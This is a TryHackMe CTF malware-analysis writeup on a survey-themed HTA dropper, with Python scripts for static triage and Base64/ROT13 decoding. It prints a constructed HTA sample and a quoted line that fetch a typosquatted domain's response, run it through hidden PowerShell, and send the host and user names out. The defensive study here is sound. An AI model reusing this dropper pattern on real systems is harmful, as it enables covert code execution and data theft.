Malware Analysis - Malhare.exe Tryhackme Writeup

Learn malware analysis, HTA & PowerShell reverse engineering, and forensic techniques in this TryHackMe Advent of Cyber 2025 challenge. Analyze an HTA malware, decode scripts, extract clues, and strengthen your cybersecurity skills with hands-on threat analysis and defender insights.


Jawstar

12/20/2025 | 3 min read

Task 2: Malware Analysis

HTA Overview

Not long ago, in the summer of 2025, researchers discovered that ransomware groups were using HTA files disguised as fake verification pages to spread the Epsilon Red ransomware. Many organisations were affected during that campaign, and security teams were reminded how important it is to understand what HTA files are and why they appear so often in corporate environments.
So, what exactly are HTA files, and why do they exist? In Wareville's digital kingdom, not every strange-looking file is a threat. Some were originally created to make the daily work of developers and administrators easier. One such helpful invention is the HTA file, short for HTML Application. An HTA file is a small desktop app built with familiar web technologies such as HTML, CSS and JavaScript (or VBScript). Unlike a regular web page, which opens inside a browser, an HTA runs directly on Windows through a built-in component, the Microsoft HTML Application Host (mshta.exe). Because mshta.exe runs the script outside the browser sandbox, with the full privileges of the user who opened the file, an HTA can look and behave like a lightweight program with its own interface and actions. In legitimate use, HTA files serve several practical purposes in Wareville and beyond:
  • Automating administrative or setup tasks.
  • Providing quick interfaces for internal scripts.
  • Testing small prototypes without building full software.
  • Offering lightweight IT support utilities for daily use.
In short, HTA files were designed as a convenient way to blend the simplicity of the web with the power of desktop applications, a tool that many TBFC’s engineers and elves still use to keep SOC-mas operations running smoothly.

HTA File Structure

Before the defenders of TBFC can recognise suspicious HTA files, it's important to understand how a normal HTA file is built. Luckily, the structure is quite simple; in fact, it's very similar to a regular HTML page. An HTA file usually contains three main parts:
  1. The HTA declaration: the <hta:application> tag defines the file as an HTML Application and can set basic properties such as the title, window size and behaviour.
  2. The interface (HTML and CSS): This section creates the layout and visuals, such as buttons, forms or text.
  3. The script (VBScript or JavaScript): Here is where the logic lives; it defines what the HTA does when opened or when a user interacts with it. Because mshta.exe runs this script with the user's privileges and lets it create COM objects such as WScript.Shell, this is the part an analyst reads first.

Answer the questions below

What is the title of the HTA application? Best Festival Company Developer Survey

What VBScript function is acting as if it is downloading the survey questions? getQuestions

What URL domain (including sub-domain) is the "questions" being downloaded from? survey.bestfestiivalcompany.com

Malhare seems to be using typosquatting, a domain that looks the same as the real one, in an attempt to hide the fact that the domain is not the intended one. What character in the domain gives this away?
i (the letter i is doubled in bestfestiivalcompany)

Malicious HTAs often include real-looking data, like survey questions, to make the file seem authentic. How many questions does the survey have?
4

Notice how even in code, social engineering persists, fake incentives like contests or trips hide in plain sight to build trust. The survey entices participation by promising a chance to win a trip to where?
south pole

The HTA is enumerating information from the local host executing the application. What two pieces of information about the computer it is running on are being exfiltrated? You should provide the two object names separated by commas.
ComputerName,UserName

What endpoint is the enumerated data being exfiltrated to?
/details

What HTTP method is being used to exfiltrate the data?
GET

After reviewing the function intended to get the survey questions, it seems that the data from the download of the questions is actually being executed. What is the line of code that executes the contents of the download?
runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False
The downloaded text is concatenated straight into the PowerShell command line, so whatever the server returns is executed. The trailing arguments to WScript.Shell.Run matter too: 0 hides the PowerShell window and False returns immediately without waiting for it to finish, so the victim never sees it.
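The HTA structure described above and the questions just answered (title, the function that fetches the "questions", the typosquatted domain, the /details exfil and the PowerShell launch) can all be pulled out of an HTA statically. The following script is an added example written for this writeup, not the room's file or the Malhare sample: SAMPLE_HTA is a constructed stand-in that shows the three parts of an HTA (declaration, interface, script) and mirrors the behaviour the questions describe, and every name, URL and the assumed legitimate domain in it are assumptions made for illustration.

```python
"""Static triage of a survey-themed HTA dropper (added example, not the room's file)."""
import difflib
import re
from urllib.parse import urlsplit

# Constructed sample: declaration, interface, script.  All strings are assumed.
SAMPLE_HTA = r'''<html>
<head>
<title>Best Festival Company Developer Survey</title>
<hta:application id="survey" applicationname="DevSurvey" windowstate="normal" scroll="no" />
<style>body { font-family: Segoe UI; }</style>
<script language="VBScript">
Function getQuestions()
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "https://survey.bestfestiivalcompany.com/questions", False
    http.Send
    feedbackString = http.responseText
    Set runObject = CreateObject("WScript.Shell")
    runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False
End Function

Sub sendDetails()
    Set net = CreateObject("WScript.Network")
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "https://survey.bestfestiivalcompany.com/details?c=" & net.ComputerName & "&u=" & net.UserName, False
    http.Send
End Sub
</script>
</head>
<body onload="sendDetails() : getQuestions()">
<h1>Developer Survey: win a trip to the South Pole!</h1>
</body>
</html>'''


def extract_title(hta):
    """Window title from the <title> element, or None."""
    m = re.search(r"<title>(.*?)</title>", hta, re.I | re.S)
    return m.group(1).strip() if m else None


def extract_functions(hta):
    """Names of VBScript Function/Sub declarations, in file order."""
    return re.findall(r"^\s*(?:Function|Sub)\s+(\w+)", hta, re.I | re.M)


def extract_http_calls(hta):
    """(method, host, path) for every XMLHTTP .Open call with a literal URL."""
    calls = []
    for method, url in re.findall(r'\.Open\s+"(\w+)"\s*,\s*"([^"]+)"', hta, re.I):
        parts = urlsplit(url)
        calls.append((method.upper(), parts.netloc, parts.path))
    return calls


def find_exec_lines(hta):
    """Lines that hand control to another process (WScript.Shell.Run/Exec, LOLBins)."""
    pat = re.compile(r"\.(Run|Exec)\b|powershell|cmd\.exe|mshta|rundll32", re.I)
    return [ln.strip() for ln in hta.splitlines() if pat.search(ln)]


def typosquat_delta(legit, observed):
    """Characters present in `observed` that do not line up with `legit`."""
    sm = difflib.SequenceMatcher(None, legit, observed)
    return [observed[j1:j2] for tag, _, _, j1, j2 in sm.get_opcodes()
            if tag in ("insert", "replace")]


def triage(hta, legit_domains=()):
    """One-shot report; legit_domains are the hostnames you expect to see."""
    calls = extract_http_calls(hta)
    squats = {}
    for host in sorted({h for _, h, _ in calls}):
        for legit in legit_domains:
            delta = typosquat_delta(legit, host)
            if delta and len("".join(delta)) <= 2:   # a couple of characters off = near miss
                squats[host] = (legit, delta)
    return {
        "title": extract_title(hta),
        "functions": extract_functions(hta),
        "http_calls": calls,
        "exec_lines": find_exec_lines(hta),
        "typosquats": squats,
    }


if __name__ == "__main__":
    # Assumed legitimate hostname, used only to show the near-miss comparison.
    for key, value in triage(SAMPLE_HTA, ("survey.bestfestivalcompany.com",)).items():
        print(f"{key}: {value}")
```

Run it against a real HTA by reading the file into `triage()`; the regexes deliberately only catch literal URLs and plain `.Run` calls, so a sample that builds its URL from concatenated fragments or obfuscated strings will need the script to be extended, which is itself a useful signal.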

It seems as if the malware site has been taken down, so we cannot download the contents that the malware was executing. Fortunately, one of the elves created a copy when the site was still active. Download the contents from here. What popular encoding scheme was used in an attempt to obfuscate the download?
base64

Decode the payload. It seems as if additional steps were taken to hide the malware! What common encryption scheme was used in the script?
ROT13 (a Caesar shift of 13; it is obfuscation rather than real encryption, since it has no key)

Either run the script (only inside an isolated analysis VM, never on a production host) or decode the flag value using online tools such as CyberChef. What is the flag value?
THM{Malware.Analysed}
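The two layers above (a Base64 wrapper, then a ROT13 string inside the decoded script) can be unwrapped without executing anything. The script below is an added example for this writeup, not the elves' capture or the room's script: STAGE2_PS and STAGED_DOWNLOAD are constructed here to mirror those two layers, and only the flag value inside them is taken from the writeup. It goes slightly beyond the question by trying every Caesar shift instead of assuming 13, which is how you would approach a sample whose shift you do not yet know.

```python
"""Unwrap a staged download: base64 layer, then a Caesar/ROT13 layer (added example)."""
import base64
import re

# Constructed second stage: what the C2 served, before base64 wrapping.
# It carries the flag ROT13-encoded and decodes it at run time.
STAGE2_PS = r"""$k = 'GUZ{Znyjner.Nanylfrq}'
$d = -join ($k.ToCharArray() | ForEach-Object {
    $c = [int]$_
    if ($c -ge 65 -and $c -le 90) { [char](($c - 65 + 13) % 26 + 65) }
    elseif ($c -ge 97 -and $c -le 122) { [char](($c - 97 + 13) % 26 + 97) }
    else { $_ } })
Write-Output $d
"""

# Constructed stand-in for the text the HTA appended after "powershell -c":
# a one-liner that base64-decodes STAGE2_PS and hands it to Invoke-Expression.
STAGED_DOWNLOAD = (
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(STAGE2_PS.encode()).decode()
    + "')))"
)

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FLAG_RE = re.compile(r"THM\{[^}]*\}")


def decode_base64_blobs(text):
    """Every long base64 run in `text` that decodes to printable UTF-8 text."""
    out = []
    for blob in B64_BLOB.findall(text):
        try:
            s = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue   # looked like base64 but was not text (or not base64 at all)
        if all(ch.isprintable() or ch in "\r\n\t" for ch in s):
            out.append(s)
    return out


def caesar(s, n):
    """Shift ASCII letters by n positions; n = 13 is ROT13, which is its own inverse."""
    out = []
    for ch in s:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + n) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + n) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def find_flag(text):
    """Try all 26 shifts; return (shift, flag) for the first that yields THM{...}."""
    for n in range(26):
        m = FLAG_RE.search(caesar(text, n))
        if m:
            return n, m.group(0)
    return None


def analyse(download):
    """Full chain: strip the base64 layer, then shift-search each decoded blob."""
    for stage in decode_base64_blobs(download):
        hit = find_flag(stage)
        if hit:
            return hit
    return None


if __name__ == "__main__":
    for stage in decode_base64_blobs(STAGED_DOWNLOAD):
        print("--- decoded stage ---")
        print(stage)
    print("result:", analyse(STAGED_DOWNLOAD))
```

Replace STAGED_DOWNLOAD with the contents of the elves' copy to run it for real; if the sample nests further layers (base64 inside the decoded stage), call `decode_base64_blobs()` again on each result before the shift search.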
